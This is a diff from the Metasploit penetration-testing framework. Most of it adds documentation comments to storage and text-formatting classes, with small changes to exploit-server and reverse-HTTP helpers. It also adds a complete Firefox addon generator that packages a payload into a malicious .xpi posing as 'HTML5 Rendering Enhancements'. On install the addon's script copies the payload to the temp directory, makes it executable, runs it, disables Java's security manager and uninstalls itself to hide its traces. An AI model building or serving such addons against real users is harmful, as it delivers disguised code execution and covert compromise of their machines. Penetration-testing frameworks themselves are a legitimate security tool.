# array supplied as an argument is passed to the constructor of the
|
# array supplied as an argument is passed to the constructor of the
|
||||||
# associated class as a means of generic initialization.
|
# associated class as a means of generic initialization.
|
||||||
#
|
#
|
||||||
|
# @param name [String] the name of the storage class.
|
||||||
|
# @param params [Object] the parameters to give the new class.
|
||||||
|
# @return [PersistentStorage] the newly created class.
|
||||||
|
# @return [nil] if class has not been added through {.add_storage_class}.
|
||||||
def self.create(name, *params)
|
def self.create(name, *params)
|
||||||
if (klass = @@storage_classes[name])
|
if (klass = @@storage_classes[name])
|
||||||
klass.new(*params)
|
klass.new(*params)
|
||||||
|
@ -27,36 +28,42 @@ class PersistentStorage
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Stub initialization routine that takes the params passed to create.
|
# Stub initialization routine that takes the params passed to create.
|
||||||
#
|
#
|
||||||
|
# @param params [Object] the parameters to initialize with.
|
||||||
def initialize(*params)
|
def initialize(*params)
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This methods stores all or part of the current state of the supplied
|
# This methods stores all or part of the current state of the supplied
|
||||||
# framework instance to whatever medium the derived class implements.
|
# framework instance to whatever medium the derived class implements.
|
||||||
# If the derived class does not implement this method, the
|
# If the derived class does not implement this method, the
|
||||||
# NotImplementedError is raised.
|
# NotImplementedError is raised.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] framework state to store.
|
||||||
|
# @return [void] no implementation.
|
||||||
|
# @raise [NotImpementedError] raised if not implemented.
|
||||||
def store(framework)
|
def store(framework)
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This method initializes the supplied framework instance with the state
|
# This method initializes the supplied framework instance with the state
|
||||||
# that is stored in the persisted backing that the derived class
|
# that is stored in the persisted backing that the derived class
|
||||||
# implements. If the derived class does not implement this method, the
|
# implements. If the derived class does not implement this method, the
|
||||||
# NotImplementedError is raised.
|
# NotImplementedError is raised.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] framework to restore state to.
|
||||||
|
# @return [void] no implementation.
|
||||||
|
# @raise [NotImplementedError] raised if not implemented.
|
||||||
def fetch(framework)
|
def fetch(framework)
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This method adds a new storage class to the hash of storage classes that
|
# This method adds a new storage class to the hash of storage classes that
|
||||||
# can be created through create.
|
# can be created through create.
|
||||||
#
|
#
|
||||||
|
# @param name [String] the name of the storage class.
|
||||||
|
# @param klass [PersistentStorage] the storage class to add.
|
||||||
|
# @return [void]
|
||||||
def self.add_storage_class(name, klass)
|
def self.add_storage_class(name, klass)
|
||||||
@@storage_classes[name] = klass
|
@@storage_classes[name] = klass
|
||||||
end
|
end
|
||||||
|
|
|
@ -2,30 +2,29 @@
|
||||||
module Msf
|
module Msf
|
||||||
class PersistentStorage
|
class PersistentStorage
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class persists the state of the framework to a flatfile in a human
|
# This class persists the state of the framework to a flatfile in a human
|
||||||
# readable format. At the moment, the level of information it conveys is
|
# readable format. At the moment, the level of information it conveys is
|
||||||
# rather basic and ugly, but this is just a prototype, so it will be improved.
|
# rather basic and ugly, but this is just a prototype, so it will be improved.
|
||||||
# Oh yes, it will be improved.
|
# Oh yes, it will be improved.
|
||||||
#
|
|
||||||
###
|
|
||||||
class Flatfile < PersistentStorage
|
class Flatfile < PersistentStorage
|
||||||
|
|
||||||
#
|
|
||||||
# Initializes the flatfile for storage based on the parameters specified.
|
# Initializes the flatfile for storage based on the parameters specified.
|
||||||
# The hash must contain a FilePath attribute.
|
# The hash must contain a FilePath attribute.
|
||||||
#
|
#
|
||||||
|
# @overload initialize(path)
|
||||||
|
# Initializes the flatfile with the set path.
|
||||||
|
# @param path [String] path of the flatfile.
|
||||||
def initialize(*params)
|
def initialize(*params)
|
||||||
raise ArgumentError, "You must specify a file path" if (params.length == 0)
|
raise ArgumentError, "You must specify a file path" if (params.length == 0)
|
||||||
|
|
||||||
self.path = params[0]
|
self.path = params[0]
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# This method stores the current state of the framework in human readable
|
# This method stores the current state of the framework in human readable
|
||||||
# form to a flatfile. This can be used as a reporting mechanism.
|
# form to a flatfile. This can be used as a reporting mechanism.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf:::Framework] the Framework to store.
|
||||||
|
# @return [void]
|
||||||
def store(framework)
|
def store(framework)
|
||||||
# Open the supplied file path for writing.
|
# Open the supplied file path for writing.
|
||||||
self.fd = File.new(self.path, "w")
|
self.fd = File.new(self.path, "w")
|
||||||
|
@ -41,10 +40,11 @@ protected
|
||||||
|
|
||||||
attr_accessor :fd, :path # :nodoc:
|
attr_accessor :fd, :path # :nodoc:
|
||||||
|
|
||||||
#
|
|
||||||
# This method stores general information about the current state of the
|
# This method stores general information about the current state of the
|
||||||
# framework instance.
|
# framework instance.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] the Framework to store.
|
||||||
|
# @return [void]
|
||||||
def store_general(framework)
|
def store_general(framework)
|
||||||
fd.print(
|
fd.print(
|
||||||
"\n" +
|
"\n" +
|
||||||
|
|
|
@ -2,22 +2,22 @@
|
||||||
module Msf
|
module Msf
|
||||||
module Serializer
|
module Serializer
|
||||||
|
|
||||||
###
|
|
||||||
#
|
|
||||||
# This class formats information in a plain-text format that
|
# This class formats information in a plain-text format that
|
||||||
# is meant to be displayed on a console or some other non-GUI
|
# is meant to be displayed on a console or some other non-GUI
|
||||||
# medium.
|
# medium.
|
||||||
#
|
|
||||||
###
|
|
||||||
class ReadableText
|
class ReadableText
|
||||||
|
|
||||||
|
#Default number of characters to wrap at.
|
||||||
DefaultColumnWrap = 70
|
DefaultColumnWrap = 70
|
||||||
|
#Default number of characters to indent.
|
||||||
DefaultIndent = 2
|
DefaultIndent = 2
|
||||||
|
|
||||||
#
|
|
||||||
# Returns a formatted string that contains information about
|
# Returns a formatted string that contains information about
|
||||||
# the supplied module instance.
|
# the supplied module instance.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module to dump information for.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] formatted text output of the dump.
|
||||||
def self.dump_module(mod, indent = " ")
|
def self.dump_module(mod, indent = " ")
|
||||||
case mod.type
|
case mod.type
|
||||||
when MODULE_PAYLOAD
|
when MODULE_PAYLOAD
|
||||||
|
@ -37,9 +37,14 @@ class ReadableText
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps an exploit's targets.
|
# Dumps an exploit's targets.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Exploit] the exploit module to dump targets
|
||||||
|
# for.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters).
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_exploit_targets(mod, indent = '', h = nil)
|
def self.dump_exploit_targets(mod, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -57,9 +62,13 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the exploit's selected target
|
# Dumps the exploit's selected target
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Exploit] the exploit module.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters)
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_exploit_target(mod, indent = '', h = nil)
|
def self.dump_exploit_target(mod, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -75,9 +84,13 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps an auxiliary's actions
|
# Dumps an auxiliary's actions
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Auxiliary] the auxiliary module.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters)
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
|
def self.dump_auxiliary_actions(mod, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -95,10 +108,14 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the table of payloads that are compatible with the supplied
|
# Dumps the table of payloads that are compatible with the supplied
|
||||||
# exploit.
|
# exploit.
|
||||||
#
|
#
|
||||||
|
# @param exploit [Msf::Exploit] the exploit module.
|
||||||
|
# @param indent [String] the indentation to use (only the length
|
||||||
|
# matters)
|
||||||
|
# @param h [String] the string to display as the table heading.
|
||||||
|
# @return [String] the string form of the table.
|
||||||
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
|
def self.dump_compatible_payloads(exploit, indent = '', h = nil)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -116,9 +133,11 @@ class ReadableText
|
||||||
tbl.to_s + "\n"
|
tbl.to_s + "\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about an exploit module.
|
# Dumps information about an exploit module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Exploit] the exploit module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_exploit_module(mod, indent = '')
|
def self.dump_exploit_module(mod, indent = '')
|
||||||
output = "\n"
|
output = "\n"
|
||||||
output << " Name: #{mod.name}\n"
|
output << " Name: #{mod.name}\n"
|
||||||
|
@ -171,9 +190,11 @@ class ReadableText
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about an auxiliary module.
|
# Dumps information about an auxiliary module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Auxiliary] the auxiliary module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_auxiliary_module(mod, indent = '')
|
def self.dump_auxiliary_module(mod, indent = '')
|
||||||
output = "\n"
|
output = "\n"
|
||||||
output << " Name: #{mod.name}\n"
|
output << " Name: #{mod.name}\n"
|
||||||
|
@ -207,9 +228,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about a payload module.
|
# Dumps information about a payload module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Payload] the payload module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_payload_module(mod, indent = '')
|
def self.dump_payload_module(mod, indent = '')
|
||||||
# General
|
# General
|
||||||
output = "\n"
|
output = "\n"
|
||||||
|
@ -244,9 +267,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps information about a module, just the basics.
|
# Dumps information about a module, just the basics.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_basic_module(mod, indent = '')
|
def self.dump_basic_module(mod, indent = '')
|
||||||
# General
|
# General
|
||||||
output = "\n"
|
output = "\n"
|
||||||
|
@ -277,13 +302,16 @@ class ReadableText
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#No current use
|
||||||
def self.dump_generic_module(mod, indent = '')
|
def self.dump_generic_module(mod, indent = '')
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the list of options associated with the
|
# Dumps the list of options associated with the
|
||||||
# supplied module.
|
# supplied module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_options(mod, indent = '')
|
def self.dump_options(mod, indent = '')
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent.length,
|
'Indent' => indent.length,
|
||||||
|
@ -309,9 +337,11 @@ class ReadableText
|
||||||
return tbl.to_s
|
return tbl.to_s
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the advanced options associated with the supplied module.
|
# Dumps the advanced options associated with the supplied module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_advanced_options(mod, indent = '')
|
def self.dump_advanced_options(mod, indent = '')
|
||||||
output = ''
|
output = ''
|
||||||
pad = indent
|
pad = indent
|
||||||
|
@ -333,9 +363,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the evasion options associated with the supplied module.
|
# Dumps the evasion options associated with the supplied module.
|
||||||
#
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_evasion_options(mod, indent = '')
|
def self.dump_evasion_options(mod, indent = '')
|
||||||
output = ''
|
output = ''
|
||||||
pad = indent
|
pad = indent
|
||||||
|
@ -358,6 +390,11 @@ class ReadableText
|
||||||
return output
|
return output
|
||||||
end
|
end
|
||||||
|
|
||||||
|
# Dumps the references associated with the supplied module.
|
||||||
|
#
|
||||||
|
# @param mod [Msf::Module] the module.
|
||||||
|
# @param indent [String] the indentation to use.
|
||||||
|
# @return [String] the string form of the information.
|
||||||
def self.dump_references(mod, indent = '')
|
def self.dump_references(mod, indent = '')
|
||||||
output = ''
|
output = ''
|
||||||
|
|
||||||
|
@ -372,9 +409,13 @@ class ReadableText
|
||||||
output
|
output
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the contents of a datastore.
|
# Dumps the contents of a datastore.
|
||||||
#
|
#
|
||||||
|
# @param name [String] displayed as the table header.
|
||||||
|
# @param ds [Msf::DataStore] the DataStore to dump.
|
||||||
|
# @param indent [Integer] the indentation size.
|
||||||
|
# @param col [Integer] the column width.
|
||||||
|
# @return [String] the formatted DataStore contents.
|
||||||
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
|
def self.dump_datastore(name, ds, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||||
tbl = Rex::Ui::Text::Table.new(
|
tbl = Rex::Ui::Text::Table.new(
|
||||||
'Indent' => indent,
|
'Indent' => indent,
|
||||||
|
@ -392,9 +433,17 @@ class ReadableText
|
||||||
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
|
return ds.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No entries in data store.\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the list of active sessions.
|
# Dumps the list of active sessions.
|
||||||
#
|
#
|
||||||
|
# @param framework [Msf::Framework] the framework to dump.
|
||||||
|
# @param opts [Hash] the options to dump with.
|
||||||
|
# @option opts :session_ids [Array] the list of sessions to dump (no
|
||||||
|
# effect).
|
||||||
|
# @option opts :verbose [Boolean] gives more information if set to
|
||||||
|
# true.
|
||||||
|
# @option opts :indent [Integer] set the indentation amount.
|
||||||
|
# @option opts :col [Integer] the column wrap width.
|
||||||
|
# @return [String] the formatted list of sessions.
|
||||||
def self.dump_sessions(framework, opts={})
|
def self.dump_sessions(framework, opts={})
|
||||||
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
ids = (opts[:session_ids] || framework.sessions.keys).sort
|
||||||
verbose = opts[:verbose] || false
|
verbose = opts[:verbose] || false
|
||||||
|
@ -437,12 +486,14 @@ class ReadableText
|
||||||
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
|
return framework.sessions.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Dumps the list of running jobs.
|
# Dumps the list of running jobs.
|
||||||
#
|
#
|
||||||
# If verbose is true, also prints the payload, LPORT, URIPATH and start
|
# @param framework [Msf::Framework] the framework.
|
||||||
# time, if they exist, for each job.
|
# @param verbose [Boolean] if true, also prints the payload, LPORT, URIPATH
|
||||||
#
|
# and start time, if they exist, for each job.
|
||||||
|
# @param indent [Integer] the indentation amount.
|
||||||
|
# @param col [Integer] the column wrap width.
|
||||||
|
# @return [String] the formatted list of running jobs.
|
||||||
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||||
columns = [ 'Id', 'Name' ]
|
columns = [ 'Id', 'Name' ]
|
||||||
|
|
||||||
|
@ -479,10 +530,13 @@ class ReadableText
|
||||||
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
|
return framework.jobs.keys.length > 0 ? tbl.to_s : "#{tbl.header_to_s}No active jobs.\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
#
|
|
||||||
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
|
# Jacked from Ernest Ellingson <erne [at] powernav.com>, modified
|
||||||
# a bit to add indention
|
# a bit to add indention
|
||||||
#
|
#
|
||||||
|
# @param str [String] the string to wrap.
|
||||||
|
# @param indent [Integer] the indentation amount.
|
||||||
|
# @param col [Integer] the column wrap width.
|
||||||
|
# @return [String] the wrapped string.
|
||||||
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
|
def self.word_wrap(str, indent = DefaultIndent, col = DefaultColumnWrap)
|
||||||
return Rex::Text.wordwrap(str, indent, col)
|
return Rex::Text.wordwrap(str, indent, col)
|
||||||
end
|
end
|
||||||
|
|
|
@ -98,4 +98,7 @@ require 'msf/core/exploit/winrm'
|
||||||
# WebApp
|
# WebApp
|
||||||
require 'msf/core/exploit/web'
|
require 'msf/core/exploit/web'
|
||||||
|
|
||||||
|
# Firefox addons
|
||||||
|
require 'msf/core/exploit/remote/firefox_addon_generator'
|
||||||
|
|
||||||
require 'msf/core/exploit/remote/browser_exploit_server'
|
require 'msf/core/exploit/remote/browser_exploit_server'
|
||||||
|
|
|
@ -92,6 +92,15 @@ module Msf
|
||||||
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
|
"#{get_resource.chomp("/")}/#{@exploit_receiver_page}"
|
||||||
end
|
end
|
||||||
|
|
||||||
|
#
|
||||||
|
# Returns the absolute URL to the module's resource that points to on_request_exploit
|
||||||
|
#
|
||||||
|
# @return [String] absolute URI to the exploit page
|
||||||
|
#
|
||||||
|
def get_module_uri
|
||||||
|
"#{get_uri.chomp("/")}/#{@exploit_receiver_page}"
|
||||||
|
end
|
||||||
|
|
||||||
#
|
#
|
||||||
# Returns the current target
|
# Returns the current target
|
||||||
#
|
#
|
||||||
|
@ -166,8 +175,10 @@ module Msf
|
||||||
# Special keys to ignore because the script registers this as [:activex] = true or false
|
# Special keys to ignore because the script registers this as [:activex] = true or false
|
||||||
next if k == :clsid or k == :method
|
next if k == :clsid or k == :method
|
||||||
|
|
||||||
if v.class == Regexp
|
if v.is_a? Regexp
|
||||||
bad_reqs << k if profile[k.to_sym] !~ v
|
bad_reqs << k if profile[k.to_sym] !~ v
|
||||||
|
elsif v.is_a? Proc
|
||||||
|
bad_reqs << k unless v.call(profile[k.to_sym])
|
||||||
else
|
else
|
||||||
bad_reqs << k if profile[k.to_sym] != v
|
bad_reqs << k if profile[k.to_sym] != v
|
||||||
end
|
end
|
||||||
|
|
|
@ -0,0 +1,174 @@
|
||||||
|
# -*- coding: binary -*-
|
||||||
|
|
||||||
|
###
|
||||||
|
#
|
||||||
|
# The FirefoxAddonGenerator allows a firefox exploit module to serve a malicious .xpi
|
||||||
|
# addon that will gain a session.
|
||||||
|
#
|
||||||
|
###
|
||||||
|
|
||||||
|
module Msf
|
||||||
|
module Exploit::Remote::FirefoxAddonGenerator
|
||||||
|
|
||||||
|
# Add in the supported datastore options
|
||||||
|
def initialize( info = {} )
|
||||||
|
super(update_info(info,
|
||||||
|
'Platform' => %w{ java linux osx solaris win },
|
||||||
|
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
[ 'Generic (Java Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => ['java'],
|
||||||
|
'Arch' => ARCH_JAVA
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Windows x86 (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Linux x86 (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'linux',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Mac OS X PPC (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_PPC,
|
||||||
|
}
|
||||||
|
],
|
||||||
|
[ 'Mac OS X x86 (Native Payload)',
|
||||||
|
{
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_X86,
|
||||||
|
}
|
||||||
|
]
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 1
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options( [
|
||||||
|
OptString.new('ADDONNAME', [ true,
|
||||||
|
"The addon name.",
|
||||||
|
"HTML5 Rendering Enhancements"
|
||||||
|
]),
|
||||||
|
OptBool.new('AutoUninstall', [ true,
|
||||||
|
"Automatically uninstall the addon after payload execution",
|
||||||
|
true
|
||||||
|
])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
# @return [Rex::Zip::Archive] containing a .xpi, ready to be served with the
|
||||||
|
# 'application/x-xpinstall' MIME type
|
||||||
|
def generate_addon_xpi
|
||||||
|
if target.name == 'Generic (Java Payload)'
|
||||||
|
jar = p.encoded_jar
|
||||||
|
jar.build_manifest(:main_class => "metasploit.Payload")
|
||||||
|
payload_file = jar.pack
|
||||||
|
payload_name='payload.jar'
|
||||||
|
payload_script=%q|
|
||||||
|
var java = Components.classes["@mozilla.org/appshell/window-mediator;1"].getService(Components.interfaces.nsIWindowMediator).getMostRecentWindow('navigator:browser').Packages.java
|
||||||
|
java.lang.System.setSecurityManager(null);
|
||||||
|
var cl = new java.net.URLClassLoader([new java.io.File(tmp.path).toURI().toURL()]);
|
||||||
|
var m = cl.loadClass("metasploit.Payload").getMethod("main", [java.lang.Class.forName("[Ljava.lang.String;")]);
|
||||||
|
m.invoke(null, [java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.lang.String"), 0)]);
|
||||||
|
|
|
||||||
|
else
|
||||||
|
payload_file = generate_payload_exe
|
||||||
|
payload_name = Rex::Text.rand_text_alphanumeric(8) + '.exe'
|
||||||
|
payload_script=%q|
|
||||||
|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
|
||||||
|
process.init(tmp);
|
||||||
|
process.run(false,[],0);
|
||||||
|
|
|
||||||
|
if target.name != 'Windows x86 (Native Payload)'
|
||||||
|
payload_script = %q|
|
||||||
|
var chmod=Components.classes["@mozilla.org/file/local;1"].createInstance(Components.interfaces.nsILocalFile);
|
||||||
|
chmod.initWithPath("/bin/chmod");
|
||||||
|
var process=Components.classes["@mozilla.org/process/util;1"].createInstance(Components.interfaces.nsIProcess);
|
||||||
|
process.init(chmod);
|
||||||
|
process.run(true, ["+x", tmp.path], 2);
|
||||||
|
| + payload_script
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
zip = Rex::Zip::Archive.new
|
||||||
|
xpi_guid = Rex::Text.rand_guid
|
||||||
|
bootstrap_script = %q|
|
||||||
|
function startup(data, reason) {
|
||||||
|
var file = Components.classes["@mozilla.org/file/directory_service;1"].
|
||||||
|
getService(Components.interfaces.nsIProperties).
|
||||||
|
get("ProfD", Components.interfaces.nsIFile);
|
||||||
|
file.append("extensions");
|
||||||
|
|
|
||||||
|
bootstrap_script << %Q|xpi_guid="#{xpi_guid}";|
|
||||||
|
bootstrap_script << %Q|payload_name="#{payload_name}";|
|
||||||
|
bootstrap_script << %q|
|
||||||
|
file.append(xpi_guid);
|
||||||
|
file.append(payload_name);
|
||||||
|
var tmp = Components.classes["@mozilla.org/file/directory_service;1"].
|
||||||
|
getService(Components.interfaces.nsIProperties).
|
||||||
|
get("TmpD", Components.interfaces.nsIFile);
|
||||||
|
tmp.append(payload_name);
|
||||||
|
tmp.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 0666);
|
||||||
|
file.copyTo(tmp.parent, tmp.leafName);
|
||||||
|
|
|
||||||
|
bootstrap_script << payload_script
|
||||||
|
|
||||||
|
if (datastore['AutoUninstall'])
|
||||||
|
bootstrap_script << %q|
|
||||||
|
try { // Fx < 4.0
|
||||||
|
Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
|
||||||
|
} catch (e) {}
|
||||||
|
try { // Fx 4.0 and later
|
||||||
|
Components.utils.import("resource://gre/modules/AddonManager.jsm");
|
||||||
|
AddonManager.getAddonByID(xpi_guid, function(addon) {
|
||||||
|
addon.uninstall();
|
||||||
|
});
|
||||||
|
} catch (e) {}
|
||||||
|
|
|
||||||
|
end
|
||||||
|
|
||||||
|
bootstrap_script << "}"
|
||||||
|
|
||||||
|
zip.add_file('bootstrap.js', bootstrap_script)
|
||||||
|
zip.add_file(payload_name, payload_file)
|
||||||
|
zip.add_file('chrome.manifest', "content\t#{xpi_guid}\t./\noverlay\tchrome://browser/content/browser.xul\tchrome://#{xpi_guid}/content/overlay.xul\n")
|
||||||
|
zip.add_file('install.rdf', %Q|<?xml version="1.0"?>
|
||||||
|
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
|
||||||
|
<Description about="urn:mozilla:install-manifest">
|
||||||
|
<em:id>#{xpi_guid}</em:id>
|
||||||
|
<em:name>#{datastore['ADDONNAME']}</em:name>
|
||||||
|
<em:version>1.0</em:version>
|
||||||
|
<em:bootstrap>true</em:bootstrap>
|
||||||
|
<em:unpack>true</em:unpack>
|
||||||
|
<em:targetApplication>
|
||||||
|
<Description>
|
||||||
|
<em:id>toolkit@mozilla.org</em:id>
|
||||||
|
<em:minVersion>1.0</em:minVersion>
|
||||||
|
<em:maxVersion>*</em:maxVersion>
|
||||||
|
</Description>
|
||||||
|
</em:targetApplication>
|
||||||
|
<em:targetApplication>
|
||||||
|
<Description>
|
||||||
|
<em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
|
||||||
|
<em:minVersion>1.0</em:minVersion>
|
||||||
|
<em:maxVersion>*</em:maxVersion>
|
||||||
|
</Description>
|
||||||
|
</em:targetApplication>
|
||||||
|
</Description>
|
||||||
|
</RDF>|)
|
||||||
|
zip.add_file('overlay.xul', %q|<?xml version="1.0"?>
|
||||||
|
<overlay xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
|
||||||
|
<script src="bootstrap.js"/>
|
||||||
|
<script><![CDATA[window.addEventListener("load", function(e) { startup(); }, false);]]></script>
|
||||||
|
</overlay>|)
|
||||||
|
zip
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -83,23 +83,10 @@ module ReverseHttp
|
||||||
# addresses.
|
# addresses.
|
||||||
#
|
#
|
||||||
def full_uri
|
def full_uri
|
||||||
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
|
addrs = bind_address
|
||||||
lhost = datastore['HIDDENHOST']
|
local_port = bind_port
|
||||||
else
|
|
||||||
lhost = datastore['LHOST']
|
|
||||||
end
|
|
||||||
if lhost.empty? or lhost == "0.0.0.0" or lhost == "::"
|
|
||||||
lhost = Rex::Socket.source_address
|
|
||||||
end
|
|
||||||
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
|
||||||
scheme = (ssl?) ? "https" : "http"
|
scheme = (ssl?) ? "https" : "http"
|
||||||
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
|
"#{scheme}://#{addrs[0]}:#{local_port}/"
|
||||||
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
|
|
||||||
else
|
|
||||||
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
|
|
||||||
end
|
|
||||||
|
|
||||||
uri
|
|
||||||
end
|
end
|
||||||
|
|
||||||
